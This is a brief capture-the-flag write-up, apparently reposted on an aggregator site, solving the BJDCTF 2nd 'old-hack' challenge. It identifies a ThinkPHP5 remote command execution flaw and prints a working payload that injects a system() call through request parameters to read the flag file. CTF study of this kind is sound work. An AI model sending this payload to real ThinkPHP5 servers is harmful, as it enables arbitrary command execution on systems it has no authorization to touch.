[BJDCTF 2nd]old-hack - 走看看

zoukankan html css js c++ java

[BJDCTF 2nd]old-hack
题目提示是thinkphp5，直接搜索thinkphp5的漏洞

发现thinkphp5有远程命令执行漏洞，详细如下文章

https://www.freebuf.com/vuls/194105.html

payload:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
查看全文

相关阅读:
Java基础
 数据库表设计
 Spring循环依赖
 Mysql类型转换
 Mysql刷题
 JavaScript
Git
告别.NET生成报表统计图的烦恼
 JS给页面标签添加事件(或超链接链接)
发现联想手机P630型号的一个严重的系统Bug

原文地址：https://www.cnblogs.com/gtx690/p/13258994.html

Copyright © 2011-2022 走看看